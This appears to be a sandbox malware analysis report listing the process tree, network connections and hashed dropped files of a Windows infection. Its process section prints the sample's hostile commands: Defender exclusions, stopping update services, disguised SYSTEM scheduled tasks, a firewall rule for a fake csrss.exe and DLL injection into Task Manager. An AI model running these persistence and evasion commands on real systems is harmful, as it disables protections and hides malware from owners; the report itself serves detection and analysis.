"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ubjehdt

C:\Users\Admin\AppData\Roaming\ubjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 52.111.227.13:443 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
MD 176.123.9.142:37637 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
NL 85.209.176.171:80 85.209.176.171 tcp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 2dad9102-511b-412f-9be5-4a80823c29e3.uuid.cdntokiog.studio udp
US 8.8.8.8:53 server16.cdntokiog.studio udp
US 8.8.8.8:53 stun.ipfire.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.49:443 server16.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

memory/864-15-0x0000000000400000-0x0000000000409000-memory.dmp

memory/864-14-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

MD5 0e64b12cab703a7fa70a265fc49d367b
SHA1 396314b33a808b6e6410ff3c2d9dfa6db313d002
SHA256 869b352a4b2dcdc66600684053ccfeb2d3be13a7d3ce2834d5584cad7a015162
SHA512 7971ac5d307914f83468945d7590fe081e6110dd59d4c51847c5a00b6f1f8232500d67a86c92bd3f7ce1e61947a3d9c9f032d85daec265dab4f7eb66afaae949

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

MD5 0e64b12cab703a7fa70a265fc49d367b
SHA1 396314b33a808b6e6410ff3c2d9dfa6db313d002
SHA256 869b352a4b2dcdc66600684053ccfeb2d3be13a7d3ce2834d5584cad7a015162
SHA512 7971ac5d307914f83468945d7590fe081e6110dd59d4c51847c5a00b6f1f8232500d67a86c92bd3f7ce1e61947a3d9c9f032d85daec265dab4f7eb66afaae949

memory/3056-23-0x0000000000400000-0x0000000000428000-memory.dmp

memory/3056-21-0x0000000000400000-0x0000000000428000-memory.dmp

memory/3056-20-0x0000000000400000-0x0000000000428000-memory.dmp

memory/3056-19-0x0000000000400000-0x0000000000428000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

MD5 a9a4824b9193a9392cd851d24cf29c75
SHA1 df53f578c718d8271e9029a8577966c40e85cfb4
SHA256 d70643eea40ddf2574a1039e1d19d135ba193c3bcc29227e3a7a0f2186ccf4cf
SHA512 4c5576a0885ebe71ed748fe0d552c6d12e927c819c04193bf57d29428ca2cdf9806c432257a0f0af50395dd5a5130b47f32b9d1ee77da8fc004b049bc8e75cba

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

MD5 a9a4824b9193a9392cd851d24cf29c75
SHA1 df53f578c718d8271e9029a8577966c40e85cfb4
SHA256 d70643eea40ddf2574a1039e1d19d135ba193c3bcc29227e3a7a0f2186ccf4cf
SHA512 4c5576a0885ebe71ed748fe0d552c6d12e927c819c04193bf57d29428ca2cdf9806c432257a0f0af50395dd5a5130b47f32b9d1ee77da8fc004b049bc8e75cba

memory/864-29-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3144-27-0x00000000010E0000-0x00000000010F6000-memory.dmp

memory/3144-36-0x0000000001320000-0x0000000001330000-memory.dmp

memory/3144-35-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-37-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-38-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-34-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-39-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-40-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-43-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-41-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-47-0x0000000003400000-0x0000000003410000-memory.dmp

memory/3144-46-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-45-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-49-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-48-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-50-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-52-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-53-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-56-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-58-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-59-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-54-0x0000000001320000-0x0000000001330000-memory.dmp

memory/3144-61-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-60-0x0000000003410000-0x0000000003420000-memory.dmp

memory/3144-63-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-62-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-64-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-65-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-67-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-68-0x0000000001310000-0x0000000001320000-memory.dmp

memory/3144-66-0x0000000001310000-0x0000000001320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C01.exe

MD5 9167b48ab2ba8a8b32efb314545a0c4d
SHA1 6ecc8d67078301a9d03c839bad82057e48a88794
SHA256 bbc268b7e554713d2286552b2eb9b4cd29dc380717e198762b1ed494fc830b42
SHA512 8ff5e130702d811aecf44e735e86ce68be552872674519c16be66c9f45731fc8cfa2fd76c602fa30fdf1223b71ea1aef3cc74d42978d4accf319a4da4a3bba2f

C:\Users\Admin\AppData\Local\Temp\C01.exe

MD5 9167b48ab2ba8a8b32efb314545a0c4d
SHA1 6ecc8d67078301a9d03c839bad82057e48a88794
SHA256 bbc268b7e554713d2286552b2eb9b4cd29dc380717e198762b1ed494fc830b42
SHA512 8ff5e130702d811aecf44e735e86ce68be552872674519c16be66c9f45731fc8cfa2fd76c602fa30fdf1223b71ea1aef3cc74d42978d4accf319a4da4a3bba2f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

MD5 81e8f0effa6ab8d26f586b5ed527bcc3
SHA1 0d71e7435ea5e07ca6022670f8d4ac89279d78f7
SHA256 16de307fbc88d27d5d0628012ecae780064c0f38114ca7974fb71d7b06992ba9
SHA512 4218da913ddf63102651ec1a463a6e44ac48270fc9eb6f2a7d5cb6408ddf996a752291dddaa8c9cc4ee4ee1a404d38f7d50d75472fe04124102231584f62dfa6

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

MD5 9a1b518f0106f548fe96669110cbd4e6
SHA1 0577e85cbd4081fbd54d208063b7882606254a31
SHA256 aed0f7cc60856257bb38f56455421b5e9a7fab79878c7ecac38156a81339fd0d
SHA512 c72771204fcc7fc8d5d217451e9d092e141df1aa7080b6c1b56aebac0a199396d9b51a30569bdadbd93806bae34b5c13a7aed169d3c4d97659824545b82466f6

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

MD5 9a1b518f0106f548fe96669110cbd4e6
SHA1 0577e85cbd4081fbd54d208063b7882606254a31
SHA256 aed0f7cc60856257bb38f56455421b5e9a7fab79878c7ecac38156a81339fd0d
SHA512 c72771204fcc7fc8d5d217451e9d092e141df1aa7080b6c1b56aebac0a199396d9b51a30569bdadbd93806bae34b5c13a7aed169d3c4d97659824545b82466f6

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

MD5 81e8f0effa6ab8d26f586b5ed527bcc3
SHA1 0d71e7435ea5e07ca6022670f8d4ac89279d78f7
SHA256 16de307fbc88d27d5d0628012ecae780064c0f38114ca7974fb71d7b06992ba9
SHA512 4218da913ddf63102651ec1a463a6e44ac48270fc9eb6f2a7d5cb6408ddf996a752291dddaa8c9cc4ee4ee1a404d38f7d50d75472fe04124102231584f62dfa6

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

MD5 6260ea09b699206fc0fdb8df9d9e8d14
SHA1 62040a73935167459b5979bae2471b709763efa0
SHA256 bbe0e5fdd48f70a4aa2437ad27c59ca15c3fd3396ecffa70dda3a8e32a983195
SHA512 0957b6ea1fc42111af74a4c059213993250cfea76c4d819d8d6a177b6457e945be51efc28175ffd889bdd72eed4c618c8c0c6bb88751e7b56757897d50bfb55e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

MD5 6260ea09b699206fc0fdb8df9d9e8d14
SHA1 62040a73935167459b5979bae2471b709763efa0
SHA256 bbe0e5fdd48f70a4aa2437ad27c59ca15c3fd3396ecffa70dda3a8e32a983195
SHA512 0957b6ea1fc42111af74a4c059213993250cfea76c4d819d8d6a177b6457e945be51efc28175ffd889bdd72eed4c618c8c0c6bb88751e7b56757897d50bfb55e

memory/3300-102-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

MD5 29dc12eac39f0bdbea57e7f7d0f5f4f8
SHA1 5274a3620d5302f327f7c2c72030a5281f84b8ae
SHA256 51a28d49ee525cfb28e97a96355de48e002225f99b278624432f20572d327903
SHA512 93cfc5f423614dcdfeff73ccb1da3c10b5fd648d44422d4171a7303d500fa13b9ad3642a58bc0d23f0fc5fda4f252a56962466fb090a2f20e7f4675cdcf283f5

memory/3300-105-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

MD5 29dc12eac39f0bdbea57e7f7d0f5f4f8
SHA1 5274a3620d5302f327f7c2c72030a5281f84b8ae
SHA256 51a28d49ee525cfb28e97a96355de48e002225f99b278624432f20572d327903
SHA512 93cfc5f423614dcdfeff73ccb1da3c10b5fd648d44422d4171a7303d500fa13b9ad3642a58bc0d23f0fc5fda4f252a56962466fb090a2f20e7f4675cdcf283f5

memory/3300-101-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1FCA.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\1FCA.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\1FCA.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

memory/3300-95-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

MD5 f75c658600de8ee2742b07ce9fcc1f79
SHA1 064adc5e6f575d2d06b92f2000f074435eb6e9ef
SHA256 786d523d39285b9614a94daa59241c0f0a1fc7f451a007800a584c2b330853fb
SHA512 e3e4b264c3056aa2c681d204b788173faf6b3716427876306e84784e75c6e6b17503a720db2ba7a5c13df97ac97ebf131c297532311d9a7446da2574f01d4762

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

MD5 f75c658600de8ee2742b07ce9fcc1f79
SHA1 064adc5e6f575d2d06b92f2000f074435eb6e9ef
SHA256 786d523d39285b9614a94daa59241c0f0a1fc7f451a007800a584c2b330853fb
SHA512 e3e4b264c3056aa2c681d204b788173faf6b3716427876306e84784e75c6e6b17503a720db2ba7a5c13df97ac97ebf131c297532311d9a7446da2574f01d4762

C:\Users\Admin\AppData\Local\Temp\23F1.exe

MD5 2fef31cdda5719e13df06a8c4a2c6fd5
SHA1 8b85b809145d88dc9d20a42d372cfd8a6638cb0a
SHA256 6e9476e26e20d6d2278a3318e6378a12c5a17cd10b18527433c0fecd2e0f9693
SHA512 5e6ad8edab707f2b7b0b3b252490ee376d3da8364528c03752a04633c060eb514d25d00885568c9bd31c83021d5a9191ba9a7277c29abfc8781560a3838f0e3c

C:\Users\Admin\AppData\Local\Temp\23F1.exe

MD5 2fef31cdda5719e13df06a8c4a2c6fd5
SHA1 8b85b809145d88dc9d20a42d372cfd8a6638cb0a
SHA256 6e9476e26e20d6d2278a3318e6378a12c5a17cd10b18527433c0fecd2e0f9693
SHA512 5e6ad8edab707f2b7b0b3b252490ee376d3da8364528c03752a04633c060eb514d25d00885568c9bd31c83021d5a9191ba9a7277c29abfc8781560a3838f0e3c

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

MD5 da0eee39485725d0adaa5678f4d1b681
SHA1 1bd7d3989821d2c92f40a682d6d08a567f5e6da2
SHA256 497b29333dcded5d2521b809843febe11b43ee3b6d74588210084deb27a70e70
SHA512 a316344340632f4c1391e912e97b747ca648ca3171b259ae24730c68db4d325eafb8eb0c1c8470c058a68099cbc5b702185b738d23a67aa1206484489179eba4

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

MD5 da0eee39485725d0adaa5678f4d1b681
SHA1 1bd7d3989821d2c92f40a682d6d08a567f5e6da2
SHA256 497b29333dcded5d2521b809843febe11b43ee3b6d74588210084deb27a70e70
SHA512 a316344340632f4c1391e912e97b747ca648ca3171b259ae24730c68db4d325eafb8eb0c1c8470c058a68099cbc5b702185b738d23a67aa1206484489179eba4

C:\Users\Admin\AppData\Local\Temp\2615.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\2615.exe

MD5 57543bf9a439bf01773d3d508a221fda
